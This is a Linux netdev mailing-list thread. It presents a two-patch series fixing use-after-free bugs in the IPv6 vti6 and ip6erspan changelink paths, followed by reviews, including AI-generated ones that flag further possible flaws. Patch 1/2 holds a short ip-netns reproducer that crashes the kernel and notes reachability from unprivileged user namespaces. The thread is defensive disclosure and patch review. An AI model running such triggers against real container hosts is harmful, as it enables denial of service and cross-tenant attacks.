public inbox for netdev@vger.kernel.org
 help / color / mirror / Atom feed
* [PATCH net 0/2] ipv6: tunnel changelink: use cached netns pointer
@ 2026-04-28 11:07 Maoyi Xie
  2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
  0 siblings, 2 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-04-28 11:07 UTC (permalink / raw)
  To: netdev
  Cc: kuniyu, shaw.leon, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

From: Maoyi Xie <maoyi.xie@ntu.edu.sg>

This series addresses two slab-use-after-free reports against the IPv6
tunnel changelink callbacks vti6_changelink() and ip6erspan_changelink(),
both reachable from an unprivileged user namespace and verified on
Linux v7.0 with KASAN.

Both bugs are sibling misses of commit 5e72ce3e3980 ("net: ipv6: Use
link netns in newlink() of rtnl_link_ops"), which migrated the
*_newlink callbacks for vti6, ip6_gre, ip6_tunnel, sit and ip_tunnel
from dev_net() to link_net but did not convert the corresponding
*_changelink callbacks. As a result, after a device is migrated via
IFLA_NET_NS_FD, the changelink path looks up the per-netns hash in the
wrong namespace, leaving a stale hash entry in the original creation
netns. The next cleanup_net() of that netns walks freed memory.

Patch 1/2 was authored by Kuniyuki Iwashima during the security
disclosure thread; it converts vti6_changelink() and vti6_update() to
use the cached t->net.

Patch 2/2 applies the equivalent conversion to ip6erspan_changelink().
The non-erspan sibling ip6gre_changelink() in the same file already
uses the cached t->net correctly.

Both bugs were originally reported on security@kernel.org on
2026-04-26 and triaged with Kuniyuki Iwashima and Xiao Liang. Posting
publicly per standard practice once the technical fix shape is
settled.

The bugs are present on all maintained LTS branches (v5.15, v6.1, v6.6,
v6.12, v6.18) with byte-identical source, hence Cc: stable@.

Tested with KASAN reproducers (unshare --user --map-root-user --net,
RTM_NEWLINK + IFLA_NET_NS_FD migration, RTM_NEWLINK changelink in
the migrated netns, then teardown of the original netns); without the
patches both reports trip within ~2 seconds, with the patches the
reproducers complete cleanly.

Kuniyuki Iwashima (1):
  ip6: vti: Use ip6_tnl.net in vti6_changelink().

Maoyi Xie (1):
  ip6_gre: Use cached t->net in ip6erspan_changelink().

 net/ipv6/ip6_gre.c |  3 ++-
 net/ipv6/ip6_vti.c | 12 +++++++-----
 2 files changed, 9 insertions(+), 6 deletions(-)

--
2.34.1


^ permalink raw reply	[flat|nested] 13+ messages in thread

* [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink().
  2026-04-28 11:07 [PATCH net 0/2] ipv6: tunnel changelink: use cached netns pointer Maoyi Xie
@ 2026-04-28 11:07 ` Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
  2026-04-30  1:18   ` Jakub Kicinski
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
  1 sibling, 2 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-04-28 11:07 UTC (permalink / raw)
  To: netdev
  Cc: kuniyu, shaw.leon, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

From: Kuniyuki Iwashima <kuniyu@google.com>

ip netns add ns1
ip netns add ns2
ip -n ns1 link add vti6_test type vti6 remote ::1 local ::2 key 7
ip -n ns1 link set vti6_test netns ns2
ip -n ns2 link set vti6_test type vti6 remote ::3 local ::4 key 9
ip netns del ns2
ip netns del ns1
[  132.495484] ------------[ cut here ]------------
[  132.497609] kernel BUG at net/core/dev.c:12376!

After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
rtnl_link_ops"), vti6_newlink() correctly resolves the per-netns vti6
hash via link_net. vti6_changelink() and vti6_update() were not
converted in that series and still read dev_net(dev) /
dev_net(t->dev), which diverge from the device's creation netns
after IFLA_NET_NS_FD migration. The result is a stale per-netns hash
entry; cleanup_net() of the original netns then walks freed memory.

Reachable from an unprivileged user namespace ("unshare --user
--map-root-user --net"); cross-tenant scope on container hosts.

Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
Cc: stable@vger.kernel.org # v5.15+
Signed-off-by: Kuniyuki Iwashima <kuniyu@google.com>
---
 net/ipv6/ip6_vti.c | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c
index ad5290be4..dcb257411 100644
--- a/net/ipv6/ip6_vti.c
+++ b/net/ipv6/ip6_vti.c
@@ -722,10 +722,11 @@ vti6_tnl_change(struct ip6_tnl *t, const struct __ip6_tnl_parm *p,
 static int vti6_update(struct ip6_tnl *t, struct __ip6_tnl_parm *p,
 		       bool keep_mtu)
 {
-	struct net *net = dev_net(t->dev);
-	struct vti6_net *ip6n = net_generic(net, vti6_net_id);
+	struct net *net = t->net;
+	struct vti6_net *ip6n;
 	int err;
 
+	ip6n = net_generic(net, vti6_net_id);
 	vti6_tnl_unlink(ip6n, t);
 	synchronize_net();
 	err = vti6_tnl_change(t, p, keep_mtu);
@@ -1031,11 +1032,12 @@ static int vti6_changelink(struct net_device *dev, struct nlattr *tb[],
 			   struct nlattr *data[],
 			   struct netlink_ext_ack *extack)
 {
-	struct ip6_tnl *t;
+	struct ip6_tnl *t = netdev_priv(dev);
+	struct net *net = t->net;
 	struct __ip6_tnl_parm p;
-	struct net *net = dev_net(dev);
-	struct vti6_net *ip6n = net_generic(net, vti6_net_id);
+	struct vti6_net *ip6n;
 
+	ip6n = net_generic(net, vti6_net_id);
 	if (dev == ip6n->fb_tnl_dev)
 		return -EINVAL;
 
-- 
2.34.1


^ permalink raw reply related	[flat|nested] 13+ messages in thread

* [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 [PATCH net 0/2] ipv6: tunnel changelink: use cached netns pointer Maoyi Xie
  2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
@ 2026-04-28 11:07 ` Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
                     ` (3 more replies)
  1 sibling, 4 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-04-28 11:07 UTC (permalink / raw)
  To: netdev
  Cc: kuniyu, shaw.leon, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

From: Maoyi Xie <maoyi.xie@ntu.edu.sg>

After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
ip6gre hash via link_net. ip6erspan_changelink() was not converted in
that series and still uses dev_net(dev), which diverges from the
device's creation netns after IFLA_NET_NS_FD migration.

This re-inserts the tunnel into the wrong per-netns hash, leaving a
stale entry in the original creation netns. When that netns is later
destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
slab-use-after-free reported by KASAN, followed by a kernel BUG at
net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().

Reachable from an unprivileged user namespace ("unshare --user
--map-root-user --net"); cross-tenant scope on container hosts.

Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
file) already uses the cached t->net correctly. The bug is specific
to ip6erspan_changelink() copying the wrong shape.

Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
Cc: stable@vger.kernel.org # v5.15+
Signed-off-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
---
 net/ipv6/ip6_gre.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
index dafcc0dcd..38ac14cc0 100644
--- a/net/ipv6/ip6_gre.c
+++ b/net/ipv6/ip6_gre.c
@@ -2261,7 +2261,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
 				struct nlattr *data[],
 				struct netlink_ext_ack *extack)
 {
-	struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
+	struct ip6_tnl *nt = netdev_priv(dev);
+	struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);
 	struct __ip6_tnl_parm p;
 	struct ip6_tnl *t;
 
-- 
2.34.1


^ permalink raw reply related	[flat|nested] 13+ messages in thread

* Re: [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink().
  2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
@ 2026-04-28 13:14   ` Eric Dumazet
  2026-04-30  1:18   ` Jakub Kicinski
  1 sibling, 0 replies; 13+ messages in thread
From: Eric Dumazet @ 2026-04-28 13:14 UTC (permalink / raw)
  To: Maoyi Xie
  Cc: netdev, kuniyu, shaw.leon, davem, kuba, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 4:07 AM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
>
> From: Kuniyuki Iwashima <kuniyu@google.com>
>
> ip netns add ns1
> ip netns add ns2
> ip -n ns1 link add vti6_test type vti6 remote ::1 local ::2 key 7
> ip -n ns1 link set vti6_test netns ns2
> ip -n ns2 link set vti6_test type vti6 remote ::3 local ::4 key 9
> ip netns del ns2
> ip netns del ns1
> [  132.495484] ------------[ cut here ]------------
> [  132.497609] kernel BUG at net/core/dev.c:12376!
>
> After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> rtnl_link_ops"), vti6_newlink() correctly resolves the per-netns vti6
> hash via link_net. vti6_changelink() and vti6_update() were not
> converted in that series and still read dev_net(dev) /
> dev_net(t->dev), which diverge from the device's creation netns
> after IFLA_NET_NS_FD migration. The result is a stale per-netns hash
> entry; cleanup_net() of the original netns then walks freed memory.
>
> Reachable from an unprivileged user namespace ("unshare --user
> --map-root-user --net"); cross-tenant scope on container hosts.
>
> Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
> Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> Cc: stable@vger.kernel.org # v5.15+
> Signed-off-by: Kuniyuki Iwashima <kuniyu@google.com>

Reviewed-by: Eric Dumazet <edumazet@google.com>

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
@ 2026-04-28 13:14   ` Eric Dumazet
  2026-04-28 19:49   ` Kuniyuki Iwashima
                     ` (2 subsequent siblings)
  3 siblings, 0 replies; 13+ messages in thread
From: Eric Dumazet @ 2026-04-28 13:14 UTC (permalink / raw)
  To: Maoyi Xie
  Cc: netdev, kuniyu, shaw.leon, davem, kuba, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 4:07 AM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
>
> From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
>
> After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> that series and still uses dev_net(dev), which diverges from the
> device's creation netns after IFLA_NET_NS_FD migration.
>
> This re-inserts the tunnel into the wrong per-netns hash, leaving a
> stale entry in the original creation netns. When that netns is later
> destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> slab-use-after-free reported by KASAN, followed by a kernel BUG at
> net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
>
> Reachable from an unprivileged user namespace ("unshare --user
> --map-root-user --net"); cross-tenant scope on container hosts.
>
> Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> file) already uses the cached t->net correctly. The bug is specific
> to ip6erspan_changelink() copying the wrong shape.
>
> Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
> Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> Cc: stable@vger.kernel.org # v5.15+
> Signed-off-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> ---
>  net/ipv6/ip6_gre.c | 3 ++-
>  1 file changed, 2 insertions(+), 1 deletion(-)
>
> diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
> index dafcc0dcd..38ac14cc0 100644
> --- a/net/ipv6/ip6_gre.c
> +++ b/net/ipv6/ip6_gre.c
> @@ -2261,7 +2261,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
>                                 struct nlattr *data[],
>                                 struct netlink_ext_ack *extack)
>  {
> -       struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
> +       struct ip6_tnl *nt = netdev_priv(dev);
> +       struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);
>         struct __ip6_tnl_parm p;
>         struct ip6_tnl *t;
>

Reviewed-by: Eric Dumazet <edumazet@google.com>

Thanks.

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
@ 2026-04-28 19:49   ` Kuniyuki Iwashima
  2026-04-29  1:58   ` Xiao Liang
  2026-04-30  1:18   ` Jakub Kicinski
  3 siblings, 0 replies; 13+ messages in thread
From: Kuniyuki Iwashima @ 2026-04-28 19:49 UTC (permalink / raw)
  To: Maoyi Xie
  Cc: netdev, shaw.leon, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 4:07 AM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
>
> From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
>
> After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> that series and still uses dev_net(dev), which diverges from the
> device's creation netns after IFLA_NET_NS_FD migration.
>
> This re-inserts the tunnel into the wrong per-netns hash, leaving a
> stale entry in the original creation netns. When that netns is later
> destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> slab-use-after-free reported by KASAN, followed by a kernel BUG at
> net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
>
> Reachable from an unprivileged user namespace ("unshare --user
> --map-root-user --net"); cross-tenant scope on container hosts.
>
> Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> file) already uses the cached t->net correctly. The bug is specific
> to ip6erspan_changelink() copying the wrong shape.
>
> Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
> Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>

nit: Reported-by is not needed if it's same with SOB.

> Cc: stable@vger.kernel.org # v5.15+
> Signed-off-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> ---
>  net/ipv6/ip6_gre.c | 3 ++-
>  1 file changed, 2 insertions(+), 1 deletion(-)
>
> diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
> index dafcc0dcd..38ac14cc0 100644
> --- a/net/ipv6/ip6_gre.c
> +++ b/net/ipv6/ip6_gre.c
> @@ -2261,7 +2261,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
>                                 struct nlattr *data[],
>                                 struct netlink_ext_ack *extack)
>  {
> -       struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
> +       struct ip6_tnl *nt = netdev_priv(dev);
> +       struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);

nit: Please keep reverse xmas tree order, and you can
reuse *t below.
https://docs.kernel.org/process/maintainer-netdev.html#local-variable-ordering-reverse-xmas-tree-rcs

  struct ip6_tnl *t = netdev_priv(dev);
  struct ip6_tnl *nt;
  ...

  ign = net_generic(nt->net, ip6gre_net_id);


Otherwise looks good.

Reviewed-by: Kuniyuki Iwashima <kuniyu@google.com>

Thanks

>         struct __ip6_tnl_parm p;
>         struct ip6_tnl *t;
>
> --
> 2.34.1
>

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
  2026-04-28 19:49   ` Kuniyuki Iwashima
@ 2026-04-29  1:58   ` Xiao Liang
  2026-04-29  2:00     ` Eric Dumazet
  2026-04-30  1:18   ` Jakub Kicinski
  3 siblings, 1 reply; 13+ messages in thread
From: Xiao Liang @ 2026-04-29  1:58 UTC (permalink / raw)
  To: Maoyi Xie
  Cc: netdev, kuniyu, davem, kuba, edumazet, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 7:07 PM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
>
> From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
>
> After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> that series and still uses dev_net(dev), which diverges from the
> device's creation netns after IFLA_NET_NS_FD migration.
>
> This re-inserts the tunnel into the wrong per-netns hash, leaving a
> stale entry in the original creation netns. When that netns is later
> destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> slab-use-after-free reported by KASAN, followed by a kernel BUG at
> net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
>
> Reachable from an unprivileged user namespace ("unshare --user
> --map-root-user --net"); cross-tenant scope on container hosts.
>
> Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> file) already uses the cached t->net correctly. The bug is specific
> to ip6erspan_changelink() copying the wrong shape.
>
> Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")

The changes look good to me. But why is 5e72ce3e3980 mentioned
here? It neither introduced nor was intended to fix this bug.

Thanks.

> Reported-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> Cc: stable@vger.kernel.org # v5.15+
> Signed-off-by: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> ---
>  net/ipv6/ip6_gre.c | 3 ++-
>  1 file changed, 2 insertions(+), 1 deletion(-)
>
> diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
> index dafcc0dcd..38ac14cc0 100644
> --- a/net/ipv6/ip6_gre.c
> +++ b/net/ipv6/ip6_gre.c
> @@ -2261,7 +2261,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
>                                 struct nlattr *data[],
>                                 struct netlink_ext_ack *extack)
>  {
> -       struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
> +       struct ip6_tnl *nt = netdev_priv(dev);
> +       struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);
>         struct __ip6_tnl_parm p;
>         struct ip6_tnl *t;
>
> --
> 2.34.1
>

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-29  1:58   ` Xiao Liang
@ 2026-04-29  2:00     ` Eric Dumazet
  2026-04-29  2:38       ` Xiao Liang
  0 siblings, 1 reply; 13+ messages in thread
From: Eric Dumazet @ 2026-04-29  2:00 UTC (permalink / raw)
  To: Xiao Liang
  Cc: Maoyi Xie, netdev, kuniyu, davem, kuba, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Tue, Apr 28, 2026 at 6:58 PM Xiao Liang <shaw.leon@gmail.com> wrote:
>
> On Tue, Apr 28, 2026 at 7:07 PM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
> >
> > From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> >
> > After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> > rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> > ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> > that series and still uses dev_net(dev), which diverges from the
> > device's creation netns after IFLA_NET_NS_FD migration.
> >
> > This re-inserts the tunnel into the wrong per-netns hash, leaving a
> > stale entry in the original creation netns. When that netns is later
> > destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> > slab-use-after-free reported by KASAN, followed by a kernel BUG at
> > net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
> >
> > Reachable from an unprivileged user namespace ("unshare --user
> > --map-root-user --net"); cross-tenant scope on container hosts.
> >
> > Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> > file) already uses the cached t->net correctly. The bug is specific
> > to ip6erspan_changelink() copying the wrong shape.
> >
> > Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
>
> The changes look good to me. But why is 5e72ce3e3980 mentioned
> here? It neither introduced nor was intended to fix this bug.

Which patch added the bug then in your opinion?

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-29  2:00     ` Eric Dumazet
@ 2026-04-29  2:38       ` Xiao Liang
  0 siblings, 0 replies; 13+ messages in thread
From: Xiao Liang @ 2026-04-29  2:38 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Maoyi Xie, netdev, kuniyu, davem, kuba, pabeni, dsahern, kuznet,
	linux-kernel, stable, security

On Wed, Apr 29, 2026 at 10:00 AM Eric Dumazet <edumazet@google.com> wrote:
>
> On Tue, Apr 28, 2026 at 6:58 PM Xiao Liang <shaw.leon@gmail.com> wrote:
> >
> > On Tue, Apr 28, 2026 at 7:07 PM Maoyi Xie <maoyixie.tju@gmail.com> wrote:
> > >
> > > From: Maoyi Xie <maoyi.xie@ntu.edu.sg>
> > >
> > > After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
> > > rtnl_link_ops"), ip6erspan_newlink() correctly resolves the per-netns
> > > ip6gre hash via link_net. ip6erspan_changelink() was not converted in
> > > that series and still uses dev_net(dev), which diverges from the
> > > device's creation netns after IFLA_NET_NS_FD migration.
> > >
> > > This re-inserts the tunnel into the wrong per-netns hash, leaving a
> > > stale entry in the original creation netns. When that netns is later
> > > destroyed, ip6gre_exit_rtnl_net() walks the stale entry, producing a
> > > slab-use-after-free reported by KASAN, followed by a kernel BUG at
> > > net/core/dev.c (LIST_POISON1) in unregister_netdevice_many_notify().
> > >
> > > Reachable from an unprivileged user namespace ("unshare --user
> > > --map-root-user --net"); cross-tenant scope on container hosts.
> > >
> > > Note: ip6gre_changelink() (the non-erspan sibling earlier in the same
> > > file) already uses the cached t->net correctly. The bug is specific
> > > to ip6erspan_changelink() copying the wrong shape.
> > >
> > > Fixes: 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of rtnl_link_ops")
> >
> > The changes look good to me. But why is 5e72ce3e3980 mentioned
> > here? It neither introduced nor was intended to fix this bug.
>
> Which patch added the bug then in your opinion?

Maybe 2d665034f239 ("net: ip6_gre: Fix ip6erspan hlen calculation")
which initially introduced ip6erspan_changelink using the wrong
dev_net()?
And ab5098fa25b9 ("ip6_gre: fix tunnel list corruption for x-netns")
fixed this for ip6gre, but ip6erspan was left.
Anyway 5e72ce3e3980 doesn't exist before v6.15.

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink().
  2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
  2026-04-28 13:14   ` Eric Dumazet
@ 2026-04-30  1:18   ` Jakub Kicinski
  2026-05-04  5:51     ` Maoyi Xie
  1 sibling, 1 reply; 13+ messages in thread
From: Jakub Kicinski @ 2026-04-30  1:18 UTC (permalink / raw)
  To: maoyixie.tju
  Cc: Jakub Kicinski, netdev, kuniyu, shaw.leon, davem, edumazet,
	pabeni, dsahern, kuznet, linux-kernel, stable, security

This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
---
ip6: vti: Use ip6_tnl.net in vti6_changelink().

After commit 5e72ce3e3980 ("net: ipv6: Use link netns in newlink() of
rtnl_link_ops"), vti6_newlink() correctly resolves the per-netns vti6
hash via link_net. vti6_changelink() and vti6_update() were not
converted in that series and still read dev_net(dev) /
dev_net(t->dev), which diverge from the device's creation netns
after IFLA_NET_NS_FD migration. The result is a stale per-netns hash
entry; cleanup_net() of the original netns then walks freed memory.

> diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c
> index ad5290be4dd6..dcb257411d6e 100644
> --- a/net/ipv6/ip6_vti.c
> +++ b/net/ipv6/ip6_vti.c
> @@ -722,10 +722,11 @@ vti6_tnl_change(struct ip6_tnl *t, const struct __ip6_tnl_parm *p,
>  static int vti6_update(struct ip6_tnl *t, struct __ip6_tnl_parm *p,
>  		       bool keep_mtu)
>  {
> -	struct net *net = dev_net(t->dev);
> -	struct vti6_net *ip6n = net_generic(net, vti6_net_id);
> +	struct net *net = t->net;
> +	struct vti6_net *ip6n;
>  	int err;

Does this fix introduce a regression by leaving a loophole in
vti6_siocdevprivate()?

While vti6_changelink() and vti6_update() now correctly use t->net,
vti6_siocdevprivate() still uses dev_net(dev) to locate the tunnel during
a tunnel modification ioctl:

net/ipv6/ip6_vti.c:vti6_siocdevprivate() {
	...
	struct net *net = dev_net(dev);
	...
	case SIOCCHGTUNNEL:
		...
		t = vti6_locate(net, &p1, cmd == SIOCADDTUNNEL);
		if (dev != ip6n->fb_tnl_dev && cmd == SIOCCHGTUNNEL) {
			if (t) {
				if (t->dev != dev) {
					err = -EEXIST;
					break;
				}
			} else
				t = netdev_priv(dev);

			err = vti6_update(t, &p1, false);
		}
	...
}

Because the collision check occurs in the new namespace (dev_net(dev)), but
vti6_update() now modifies the original namespace's hash table (t->net),
could an attacker in the new namespace configure their tunnel to perfectly
match the parameters of an existing victim tunnel in the original namespace?

Since the check in the new namespace finds no collision, it seems it bypasses
the error check. Then vti6_update() prepends the attacker's tunnel
into the original namespace's hash table, which might allow intercepting or
hijacking traffic destined for the victim tunnel.

Should vti6_siocdevprivate() also be updated to use t->net for collision
checks to prevent cross-namespace traffic hijacking?
-- 
pw-bot: cr

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
                     ` (2 preceding siblings ...)
  2026-04-29  1:58   ` Xiao Liang
@ 2026-04-30  1:18   ` Jakub Kicinski
  2026-04-30 10:06     ` Maoyi Xie
  3 siblings, 1 reply; 13+ messages in thread
From: Jakub Kicinski @ 2026-04-30  1:18 UTC (permalink / raw)
  To: maoyixie.tju
  Cc: Jakub Kicinski, netdev, kuniyu, shaw.leon, davem, edumazet,
	pabeni, dsahern, kuznet, linux-kernel, stable, security

This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
---
ip6_gre: Use cached t->net in ip6erspan_changelink().

This commit fixes an issue where ip6erspan_changelink() uses the device
creation netns instead of the per-netns ip6gre hash. This ensures the tunnel
is inserted into the correct hash, avoiding a stale entry and subsequent
use-after-free during netns destruction.

> diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
> index 63fc8556b475..c5978e0bdfe3 100644
> --- a/net/ipv6/ip6_gre.c
> +++ b/net/ipv6/ip6_gre.c
> @@ -2262,7 +2262,8 @@ static int ip6erspan_changelink(struct net_device *dev, struct nlattr *tb[],
>  				struct nlattr *data[],
>  				struct netlink_ext_ack *extack)
>  {
> -	struct ip6gre_net *ign = net_generic(dev_net(dev), ip6gre_net_id);
> +	struct ip6_tnl *nt = netdev_priv(dev);
> +	struct ip6gre_net *ign = net_generic(nt->net, ip6gre_net_id);
>  	struct __ip6_tnl_parm p;
>  	struct ip6_tnl *t;

While reviewing this area, I noticed a regression further down in
ip6erspan_changelink() regarding the metadata tunnel unlinking.

If an existing ERSPAN tunnel with metadata collection enabled is modified via
a netlink changelink request to disable metadata collection, does the unlink
sequence clear the correct pointer?

Looking at the rest of ip6erspan_changelink():

    ip6gre_tunnel_unlink_md(ign, t);
    ip6gre_tunnel_unlink(ign, t);
    ip6erspan_tnl_change(t, &p, !tb[IFLA_MTU]);
    ip6erspan_tunnel_link_md(ign, t);

Because ip6gre_tunnel_unlink_md() is called instead of
ip6erspan_tunnel_unlink_md(), it evaluates the old collect_md state but
clears ign->collect_md_tun instead of ign->collect_md_tun_erspan.

This seems to leave ign->collect_md_tun_erspan pointing to the tunnel.

Since ip6erspan_tnl_change() updates the parameters to disable collect_md,
the subsequent call to ip6erspan_tunnel_link_md() will skip updating the
pointer.

When the tunnel is eventually deleted, ip6erspan_tunnel_unlink_md() would
be bypassed entirely because collect_md is now false.

Could this leave ign->collect_md_tun_erspan as a dangling pointer,
causing a use-after-free when an incoming ERSPAN packet triggers
ip6gre_tunnel_lookup() and dereferences it?

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink().
  2026-04-30  1:18   ` Jakub Kicinski
@ 2026-04-30 10:06     ` Maoyi Xie
